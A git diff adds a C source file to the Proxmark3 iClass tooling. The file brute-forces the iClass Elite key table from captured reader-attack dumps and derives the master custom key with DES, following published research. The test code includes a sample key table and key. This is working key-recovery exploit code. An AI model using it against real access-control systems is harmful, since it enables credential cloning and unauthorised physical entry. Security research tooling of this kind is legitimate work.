X-Git-Url: https://git.zerfleddert.de/cgi-bin/gitweb.cgi/proxmark3-svn/blobdiff_plain/6c0f60ca7bcd7737b5d3867004f1cbdc9532720c..3ad48540d4d77f50cc62d16acb78f17019ef431d:/client/loclass/elite_crack.c?ds=sidebyside diff --git a/client/loclass/elite_crack.c b/client/loclass/elite_crack.c new file mode 100644 index 00000000..27a2a1bc --- /dev/null +++ b/client/loclass/elite_crack.c @@ -0,0 +1,526 @@ +#include +#include +#include +#include +#include +#include "cipherutils.h" +#include "cipher.h" +#include "ikeys.h" +#include "elite_crack.h" +#include "fileutils.h" +#include "des.h" + +/** + * @brief Permutes a key from standard NIST format to Iclass specific format + * from http://www.proxmark.org/forum/viewtopic.php?pid=11220#p11220 + * + * If you permute [6c 8d 44 f9 2a 2d 01 bf] you get [8a 0d b9 88 bb a7 90 ea] as shown below. + * + * 1 0 1 1 1 1 1 1 bf + * 0 0 0 0 0 0 0 1 01 + * 0 0 1 0 1 1 0 1 2d + * 0 0 1 0 1 0 1 0 2a + * 1 1 1 1 1 0 0 1 f9 + * 0 1 0 0 0 1 0 0 44 + * 1 0 0 0 1 1 0 1 8d + * 0 1 1 0 1 1 0 0 6c + * + * 8 0 b 8 b a 9 e + * a d 9 8 b 7 0 a + * + * @param key + * @param dest + */ +void permutekey(uint8_t key[8], uint8_t dest[8]) +{ + + int i; + for(i = 0 ; i < 8 ; i++) + { + dest[i] = (((key[7] & (0x80 >> i)) >> (7-i)) << 7) | + (((key[6] & (0x80 >> i)) >> (7-i)) << 6) | + (((key[5] & (0x80 >> i)) >> (7-i)) << 5) | + (((key[4] & (0x80 >> i)) >> (7-i)) << 4) | + (((key[3] & (0x80 >> i)) >> (7-i)) << 3) | + (((key[2] & (0x80 >> i)) >> (7-i)) << 2) | + (((key[1] & (0x80 >> i)) >> (7-i)) << 1) | + (((key[0] & (0x80 >> i)) >> (7-i)) << 0); + } + + return; +} +/** + * Permutes a key from iclass specific format to NIST format + * @brief permutekey_rev + * @param key + * @param dest + */ +void permutekey_rev(uint8_t key[8], uint8_t dest[8]) +{ + int i; + for(i = 0 ; i < 8 ; i++) + { + dest[7-i] = (((key[0] & (0x80 >> i)) >> (7-i)) << 7) | + (((key[1] & (0x80 >> i)) >> (7-i)) << 6) | + (((key[2] & (0x80 >> i)) >> (7-i)) << 5) | + (((key[3] & (0x80 >> i)) >> (7-i)) << 4) | + (((key[4] & (0x80 >> i)) >> (7-i)) << 3) | + (((key[5] & (0x80 >> i)) >> (7-i)) << 2) | + (((key[6] & (0x80 >> i)) >> (7-i)) << 1) | + (((key[7] & (0x80 >> i)) >> (7-i)) << 0); + } +} + +/** + * Helper function for hash1 + * @brief rr + * @param val + * @return + */ +uint8_t rr(uint8_t val) +{ + return val >> 1 | (( val & 1) << 7); +} +/** + * Helper function for hash1 + * @brief rl + * @param val + * @return + */ +uint8_t rl(uint8_t val) +{ + return val << 1 | (( val & 0x80) >> 7); +} +/** + * Helper function for hash1 + * @brief swap + * @param val + * @return + */ +uint8_t swap(uint8_t val) +{ + return ((val >> 4) & 0xFF) | ((val &0xFF) << 4); +} + +/** + * Hash1 takes CSN as input, and determines what bytes in the keytable will be used + * when constructing the K_sel. + * @param csn the CSN used + * @param k output + */ +void hash1(uint8_t csn[] , uint8_t k[]) +{ + k[0] = csn[0]^csn[1]^csn[2]^csn[3]^csn[4]^csn[5]^csn[6]^csn[7]; + k[1] = csn[0]+csn[1]+csn[2]+csn[3]+csn[4]+csn[5]+csn[6]+csn[7]; + k[2] = rr(swap( csn[2]+k[1] )); + k[3] = rr(swap( csn[3]+k[0] )); + k[4] = ~rr(swap( csn[4]+k[2] ))+1; + k[5] = ~rr(swap( csn[5]+k[3] ))+1; + k[6] = rr( csn[6]+(k[4]^0x3c) ); + k[7] = rl( csn[7]+(k[5]^0xc3) ); + int i; + for(i = 7; i >=0; i--) + k[i] = k[i] & 0x7F; +} + + +/** + * @brief Reads data from the iclass-reader-attack dump file. + * @param dump, data from a iclass reader attack dump. The format of the dumpdata is expected to be as follows: + * <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC><8 byte HASH1><1 byte NUM_BYTES_TO_RECOVER><3 bytes BYTES_TO_RECOVER> + * .. N times... + * + * So the first attack, with 3 bytes to recover would be : ... 03000145 + * And a later attack, with 1 byte to recover (byte 0x5)would be : ...01050000 + * And an attack, with 2 bytes to recover (byte 0x5 and byte 0x07 )would be : ...02050700 + * + * @param cc_nr an array to store cc_nr into (12 bytes) + * @param csn an arracy ot store CSN into (8 bytes) + * @param received_mac an array to store MAC into (4 bytes) + * @param i the number to read. Should be less than 127, or something is wrong... + * @return + */ +int _readFromDump(uint8_t dump[], dumpdata* item, uint8_t i) +{ + size_t itemsize = sizeof(dumpdata); + //dumpdata item = {0}; + memcpy(item,dump+i*itemsize, itemsize); + if(true) + { + printvar("csn", item->csn,8); + printvar("cc_nr", item->cc_nr,12); + printvar("mac", item->mac,4); + } + return 0; +} + +static uint32_t startvalue = 0; +/** + * @brief Performs brute force attack against a dump-data item, containing csn, cc_nr and mac. + *This method calculates the hash1 for the CSN, and determines what bytes need to be bruteforced + *on the fly. If it finds that more than three bytes need to be bruteforced, it aborts. + *It updates the keytable with the findings, also using the upper half of the 16-bit ints + *to signal if the particular byte has been cracked or not. + * + * @param dump The dumpdata from iclass reader attack. + * @param keytable where to write found values. + * @return + */ +int bruteforceItem(dumpdata item, uint16_t keytable[]) +{ + int errors = 0; + uint8_t key_sel_p[8] = { 0 }; + uint8_t div_key[8] = {0}; + int found = false; + uint8_t key_sel[8] = {0}; + uint8_t calculated_MAC[4] = { 0 }; + + //Get the key index (hash1) + uint8_t key_index[8] = {0}; + hash1(item.csn, key_index); + + + /* + * Determine which bytes to retrieve. A hash is typically + * 01010000454501 + * We go through that hash, and in the corresponding keytable, we put markers + * on what state that particular index is: + * - CRACKED (this has already been cracked) + * - BEING_CRACKED (this is being bruteforced now) + * - CRACK_FAILED (self-explaining...) + * + * The markers are placed in the high area of the 16 bit key-table. + * Only the lower eight bits correspond to the (hopefully cracked) key-value. + **/ + uint8_t bytes_to_recover[3] = {0}; + uint8_t numbytes_to_recover = 0 ; + int i; + for(i =0 ; i < 8 ; i++) + { + if(keytable[key_index[i]] & (CRACKED | BEING_CRACKED)) continue; + bytes_to_recover[numbytes_to_recover++] = key_index[i]; + keytable[key_index[i]] |= BEING_CRACKED; + + if(numbytes_to_recover > 3) + { + prnlog("The CSN requires > 3 byte bruteforce, not supported"); + printvar("CSN", item.csn,8); + printvar("HASH1", key_index,8); + + //Before we exit, reset the 'BEING_CRACKED' to zero + keytable[bytes_to_recover[0]] &= ~BEING_CRACKED; + keytable[bytes_to_recover[1]] &= ~BEING_CRACKED; + keytable[bytes_to_recover[2]] &= ~BEING_CRACKED; + + return 1; + } + } + + /* + *A uint32 has room for 4 bytes, we'll only need 24 of those bits to bruteforce up to three bytes, + */ + uint32_t brute = startvalue; + /* + Determine where to stop the bruteforce. A 1-byte attack stops after 256 tries, + (when brute reaches 0x100). And so on... + bytes_to_recover = 1 --> endmask = 0x0000100 + bytes_to_recover = 2 --> endmask = 0x0010000 + bytes_to_recover = 3 --> endmask = 0x1000000 + */ + + uint32_t endmask = 1 << 8*numbytes_to_recover; + + for(i =0 ; i < numbytes_to_recover && numbytes_to_recover > 1; i++) + prnlog("Bruteforcing byte %d", bytes_to_recover[i]); + + while(!found && !(brute & endmask)) + { + + //Update the keytable with the brute-values + for(i =0 ; i < numbytes_to_recover; i++) + { + keytable[bytes_to_recover[i]] &= 0xFF00; + keytable[bytes_to_recover[i]] |= (brute >> (i*8) & 0xFF); + } + + // Piece together the key + key_sel[0] = keytable[key_index[0]] & 0xFF;key_sel[1] = keytable[key_index[1]] & 0xFF; + key_sel[2] = keytable[key_index[2]] & 0xFF;key_sel[3] = keytable[key_index[3]] & 0xFF; + key_sel[4] = keytable[key_index[4]] & 0xFF;key_sel[5] = keytable[key_index[5]] & 0xFF; + key_sel[6] = keytable[key_index[6]] & 0xFF;key_sel[7] = keytable[key_index[7]] & 0xFF; + + //Permute from iclass format to standard format + permutekey_rev(key_sel,key_sel_p); + //Diversify + diversifyKey(item.csn, key_sel_p, div_key); + //Calc mac + doMAC(item.cc_nr, div_key,calculated_MAC); + + if(memcmp(calculated_MAC, item.mac, 4) == 0) + { + for(i =0 ; i < numbytes_to_recover; i++) + prnlog("=> %d: 0x%02x", bytes_to_recover[i],0xFF & keytable[bytes_to_recover[i]]); + found = true; + break; + } + brute++; + if((brute & 0xFFFF) == 0) + { + printf("%d",(brute >> 16) & 0xFF); + fflush(stdout); + } + } + if(! found) + { + prnlog("Failed to recover %d bytes using the following CSN",numbytes_to_recover); + printvar("CSN",item.csn,8); + errors++; + //Before we exit, reset the 'BEING_CRACKED' to zero + for(i =0 ; i < numbytes_to_recover; i++) + { + keytable[bytes_to_recover[i]] &= 0xFF; + keytable[bytes_to_recover[i]] |= CRACK_FAILED; + } + + }else + { + for(i =0 ; i < numbytes_to_recover; i++) + { + keytable[bytes_to_recover[i]] &= 0xFF; + keytable[bytes_to_recover[i]] |= CRACKED; + } + + } + return errors; +} + + +/** + * From dismantling iclass-paper: + * Assume that an adversary somehow learns the first 16 bytes of hash2(K_cus ), i.e., y [0] and z [0] . + * Then he can simply recover the master custom key K_cus by computing + * K_cus = ~DES(z[0] , y[0] ) . + * + * Furthermore, the adversary is able to verify that he has the correct K cus by + * checking whether z [0] = DES enc (K_cus , ~K_cus ). + * @param keytable an array (128 bytes) of hash2(kcus) + * @param master_key where to put the master key + * @return 0 for ok, 1 for failz + */ +int calculateMasterKey(uint8_t first16bytes[], uint64_t master_key[] ) +{ + des_context ctx_e = {DES_ENCRYPT,{0}}; + + uint8_t z_0[8] = {0}; + uint8_t y_0[8] = {0}; + uint8_t z_0_rev[8] = {0}; + uint8_t key64[8] = {0}; + uint8_t key64_negated[8] = {0}; + uint8_t result[8] = {0}; + + // y_0 and z_0 are the first 16 bytes of the keytable + memcpy(y_0,first16bytes,8); + memcpy(z_0,first16bytes+8,8); + + // Our DES-implementation uses the standard NIST + // format for keys, thus must translate from iclass + // format to NIST-format + permutekey_rev(z_0, z_0_rev); + + // ~K_cus = DESenc(z[0], y[0]) + des_setkey_enc( &ctx_e, z_0_rev ); + des_crypt_ecb(&ctx_e, y_0, key64_negated); + + int i; + for(i = 0; i < 8 ; i++) + { + key64[i] = ~key64_negated[i]; + } + + // Can we verify that the key is correct? + // Once again, key is on iclass-format + uint8_t key64_stdformat[8] = {0}; + permutekey_rev(key64, key64_stdformat); + + des_setkey_enc( &ctx_e, key64_stdformat ); + des_crypt_ecb(&ctx_e, key64_negated, result); + prnlog("\nHigh security custom key (Kcus):"); + printvar("Std format ", key64_stdformat,8); + printvar("Iclass format", key64,8); + + if(master_key != NULL) + memcpy(master_key, key64, 8); + + if(memcmp(z_0,result,4) != 0) + { + prnlog("Failed to verify calculated master key (k_cus)! Something is wrong."); + return 1; + }else{ + prnlog("Key verified ok!\n"); + } + return 0; +} +/** + * @brief Same as bruteforcefile, but uses a an array of dumpdata instead + * @param dump + * @param dumpsize + * @param keytable + * @return + */ +int bruteforceDump(uint8_t dump[], size_t dumpsize, uint16_t keytable[]) +{ + uint8_t i; + int errors = 0; + size_t itemsize = sizeof(dumpdata); + clock_t t1 = clock(); + + dumpdata* attack = (dumpdata* ) malloc(itemsize); + + for(i = 0 ; i * itemsize < dumpsize ; i++ ) + { + memcpy(attack,dump+i*itemsize, itemsize); + errors += bruteforceItem(*attack, keytable); + } + free(attack); + clock_t t2 = clock(); + float diff = (((float)t2 - (float)t1) / CLOCKS_PER_SEC ); + prnlog("\nPerformed full crack in %f seconds",diff); + + // Pick out the first 16 bytes of the keytable. + // The keytable is now in 16-bit ints, where the upper 8 bits + // indicate crack-status. Those must be discarded for the + // master key calculation + uint8_t first16bytes[16] = {0}; + + for(i = 0 ; i < 16 ; i++) + { + first16bytes[i] = keytable[i] & 0xFF; + if(!(keytable[i] & CRACKED)) + { + prnlog("Error, we are missing byte %d, custom key calculation will fail...", i); + } + } + errors += calculateMasterKey(first16bytes, NULL); + return errors; +} +/** + * Perform a bruteforce against a file which has been saved by pm3 + * + * @brief bruteforceFile + * @param filename + * @return + */ +int bruteforceFile(const char *filename, uint16_t keytable[]) +{ + + FILE *f = fopen(filename, "rb"); + if(!f) { + prnlog("Failed to read from file '%s'", filename); + return 1; + } + + fseek(f, 0, SEEK_END); + long fsize = ftell(f); + fseek(f, 0, SEEK_SET); + + uint8_t *dump = malloc(fsize); + size_t bytes_read = fread(dump, fsize, 1, f); + + fclose(f); + if (bytes_read < fsize) + { + prnlog("Error, could only read %d bytes (should be %d)",bytes_read, fsize ); + } + return bruteforceDump(dump,fsize,keytable); +} +/** + * + * @brief Same as above, if you don't care about the returned keytable (results only printed on screen) + * @param filename + * @return + */ +int bruteforceFileNoKeys(const char *filename) +{ + uint16_t keytable[128] = {0}; + return bruteforceFile(filename, keytable); +} + +// --------------------------------------------------------------------------------- +// ALL CODE BELOW THIS LINE IS PURELY TESTING +// --------------------------------------------------------------------------------- +// ---------------------------------------------------------------------------- +// TEST CODE BELOW +// ---------------------------------------------------------------------------- + +int _testBruteforce() +{ + int errors = 0; + if(true){ + // First test + prnlog("[+] Testing crack from dumpfile..."); + + /** + Expected values for the dumpfile: + High Security Key Table + + 00 F1 35 59 A1 0D 5A 26 7F 18 60 0B 96 8A C0 25 C1 + 10 BF A1 3B B0 FF 85 28 75 F2 1F C6 8F 0E 74 8F 21 + 20 14 7A 55 16 C8 A9 7D B3 13 0C 5D C9 31 8D A9 B2 + 30 A3 56 83 0F 55 7E DE 45 71 21 D2 6D C1 57 1C 9C + 40 78 2F 64 51 42 7B 64 30 FA 26 51 76 D3 E0 FB B6 + 50 31 9F BF 2F 7E 4F 94 B4 BD 4F 75 91 E3 1B EB 42 + 60 3F 88 6F B8 6C 2C 93 0D 69 2C D5 20 3C C1 61 95 + 70 43 08 A0 2F FE B3 26 D7 98 0B 34 7B 47 70 A0 AB + + **** The 64-bit HS Custom Key Value = 5B7C62C491C11B39 **** + **/ + uint16_t keytable[128] = {0}; + //save some time... + startvalue = 0x7B0000; + errors |= bruteforceFile("iclass_dump.bin",keytable); + } + return errors; +} + +int _test_iclass_key_permutation() +{ + uint8_t testcase[8] = {0x6c,0x8d,0x44,0xf9,0x2a,0x2d,0x01,0xbf}; + uint8_t testcase_output[8] = {0}; + uint8_t testcase_output_correct[8] = {0x8a,0x0d,0xb9,0x88,0xbb,0xa7,0x90,0xea}; + uint8_t testcase_output_rev[8] = {0}; + permutekey(testcase, testcase_output); + permutekey_rev(testcase_output, testcase_output_rev); + + + if(memcmp(testcase_output, testcase_output_correct,8) != 0) + { + prnlog("Error with iclass key permute!"); + printarr("testcase_output", testcase_output, 8); + printarr("testcase_output_correct", testcase_output_correct, 8); + return 1; + + } + if(memcmp(testcase, testcase_output_rev, 8) != 0) + { + prnlog("Error with reverse iclass key permute"); + printarr("testcase", testcase, 8); + printarr("testcase_output_rev", testcase_output_rev, 8); + return 1; + } + + prnlog("[+] Iclass key permutation OK!"); + return 0; +} + +int testElite() +{ + prnlog("[+] Testing iClass Elite functinality..."); + prnlog("[+] Testing key diversification ..."); + + int errors = 0 ; + errors +=_test_iclass_key_permutation(); + errors += _testBruteforce(); + return errors; + +} +